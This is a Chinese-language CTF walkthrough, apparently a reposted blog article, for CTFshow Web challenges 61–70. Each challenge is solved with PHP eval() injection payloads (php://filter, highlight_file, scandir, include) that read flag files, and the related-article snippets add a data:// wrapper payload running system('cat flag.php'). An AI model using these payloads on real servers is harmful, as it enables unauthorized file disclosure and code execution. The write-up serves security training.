《CTFshow-Web入门》07. Web 61~70

这篇具有很好参考价值的文章主要介绍了《CTFshow-Web入门》07. Web 61~70。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


ctf - web入门

索引

  • web61~70:post 请求之 eval() 利用。

web61~65

题解

这几个题都和 web58 一样。可能内部禁用的函数不一样吧。但 payload 都差不多。不多解释了。

《CTFshow-Web入门》07. Web 61~70

以下解法随便挑一个即可。可能不同题会有部分函数被禁。

payload1

c=include "php://filter/read=convert.base64-encode/resource=flag.php";

payload2

c=show_source('flag.php');

payload3

c=file_get_contents('flag.php');

payload4

c=highlight_file("flag.php");

《CTFshow-Web入门》07. Web 61~70

web66

题解

题目没变化。

《CTFshow-Web入门》07. Web 61~70

随便试一个函数。

《CTFshow-Web入门》07. Web 61~70

根据提示,先扫一下根目录。

c=print_r(scandir('/'));

《CTFshow-Web入门》07. Web 61~70

可得 payload:

c=highlight_file("/flag.txt");

原理

PHP 中:

  • scandir():扫描目录。

web67

题解

题目就不贴了。和前几题一模一样的。

区别在于,print_r() 函数被禁了。

那就用 var_dump() 函数。

c=var_dump(scandir('/'));

《CTFshow-Web入门》07. Web 61~70

payload

c=highlight_file("/flag.txt");

原理

  • var_dump():打印变量的相关信息

web68

题解

一上来就说 highlight_file() 函数被禁了。

《CTFshow-Web入门》07. Web 61~70

先尝试扫一下根目录。

c=var_dump(scandir('/'));

《CTFshow-Web入门》07. Web 61~70

那就使用 include() 函数将文件内容包含进来。

payload

c=include("/flag.txt");

原理

  • include():表达式包含并运行指定文件。

web69

题解

题目与 web68 一样。

但是 var_dump() 被禁了。

换一个函数即可。

c=var_export(scandir("/"));

《CTFshow-Web入门》07. Web 61~70

payload

c=include("/flag.txt");

原理

  • var_export:输出或返回变量的可解析字符串表示。

web70

题解

看题,禁用了一堆函数。

《CTFshow-Web入门》07. Web 61~70

但其实沿用 web69 的方法即可。

c=var_export(scandir("/"));
c=include("/flag.txt");

原理

  • error_reporting():设置应该报告何种 PHP 错误。
  • ini_set():配置选项设置值。

对这题来说没啥用的函数。


一笑出门去,千里落花风。

——《水调歌头 · 我饮不须劝》(宋)辛弃疾 文章来源地址https://www.toymoban.com/news/detail-429990.html

到了这里,关于《CTFshow-Web入门》07. Web 61~70的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • ctfshow-web入门-信息收集

    ​Ctrl+U或者F12 查看页面源代码. ​JS禁用F12,Ctrl+U查看源代码 ​前端未泄露,抓包查看返回包发现Flag ​robots.txt文件泄露 ​phps源码泄露,phps存放着php源码,可通过尝试访问/index.phps读取,或者尝试扫描工具扫描读取 phps即为 PHP Source。 ​访问index.phps下载phps文件查看flag ​网站源

    2024年02月05日
    浏览(36)
  • ctfshow-web入门37-52

    include($c); 表达式包含并运行指定文件。 使用data伪协议 ?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== 是?php system(\\\'cat flag.php\\\');? base64加密 源代码查看得到flag 多禁用了php和file。不会改变伪协议,继续使用上一题命令 ?c=data://text/plain

    2024年02月06日
    浏览(41)
  • ctfshow-web入门-爆破wp

    ​进入主页为登录框,随便输入信息用burp抓包,发现Authorization认证使用Base64加密传输,解密发现为刚才输入的信息 右键发送至Intruder进行爆破,使用题目给出的字典进行爆破并添加变量 添加前缀使用户名固定并用Base64加密传输,记得取消勾选url-encode,不然会转义Base64的\\\"=

    2024年02月05日
    浏览(44)
  • ctfshow-Web入门-命令执行wp

    ​简单的命令执行,使用/i模式过滤大小写flag,可以使用通配符绕过过滤。 ​比上一题多过滤system与php,可以使用其他函数来执行命令,具体可以参考PHP中常见的命令执行函数与代码执行函数_-passthru-CSDN博客 ​多过滤cat,sort,shell,\\\'.\\\',空格,\\\'\\\'\\\' ​cat,sort可用其他查询命令,如

    2024年02月05日
    浏览(74)
  • CTFShow-WEB入门篇命令执行详细Wp(29-40)

    CTFShow 平台:https://ctf.show/ preg_match():函数执行一个正则表达式匹配。 这里过滤了 flag/i 过滤的不是很多就两个所以方法有很多种 ctfshow{f6702830-5d6b-4cfb-9678-4ae7fa2ba198} 过滤了 flag、system、php 其实还可以使用上面的方法换一个命令执行函数即可。 命令执行函数: passthru、she

    2024年02月10日
    浏览(39)
  • ctfshow-web3

    CTF 加解密合集 CTF Web合集 这个题目一看就知道是一个文件包含漏洞 php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。 所以就可以直接执行命令 发现一个ctf_go_go_go的文件,然后读取就是了 以上

    2024年02月15日
    浏览(35)
  • ctfshow-web14

    CTF 加解密合集 CTF Web合集 首先看到这个,swith,那么直接输入4,则会打印$url的值 然后访问一下 查看一下,发现完整的请求是http://c7ff9ed6-dccd-4d01-907a-f1c61c016c15.challenge.ctf.show/here_1s_your_f1ag.php?query=1 查看注释,发现还有一些内容被处理了: 首先先测试注入,发现是数字型的,

    2024年02月11日
    浏览(31)
  • ctfshow-web13 文件上传

    CTF 加解密合集 CTF Web合集 网络安全知识库 文中工具皆可关注 皓月当空w 公众号 发送 工具 获取 首先看到是一个上传页面,测试其他无果,遂进行目录遍历,发现upload.php.bak文件 可以看到这里的限制条件,大小,以及内容,这里可以使用.user.ini进行上传,具体参考:

    2024年02月11日
    浏览(37)
  • CTFshow web入门---web56

    题目: 题目分析: 查看本题,发现本题为命令执行类题目,但是有一个很致命的点,那么就是他过滤了所有的字母和数字,以及一系列的符号。因此本题最值得推敲的点就是如何实现 无字母数字的命令执行 通过拜读P神的一篇文章,其中《无字母数字webshell之提高篇》讲到了

    2023年04月22日
    浏览(37)
  • ctfshow web入门 web141-145

    1.web141 ^w+$表示在开头和末尾匹配字母数字_,传入的v3值不能有字母数字_,即无字母的命令执行 php中1-phpinfo()是可以执行的,加减乘除都可以实现 这里或,异或,取反等运算都可以 这里采用羽师傅的异或脚本生成payload payload: 2.web142 payload: 3.web143 过滤了取反,+,-等符号,还可

    2024年02月22日
    浏览(65)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包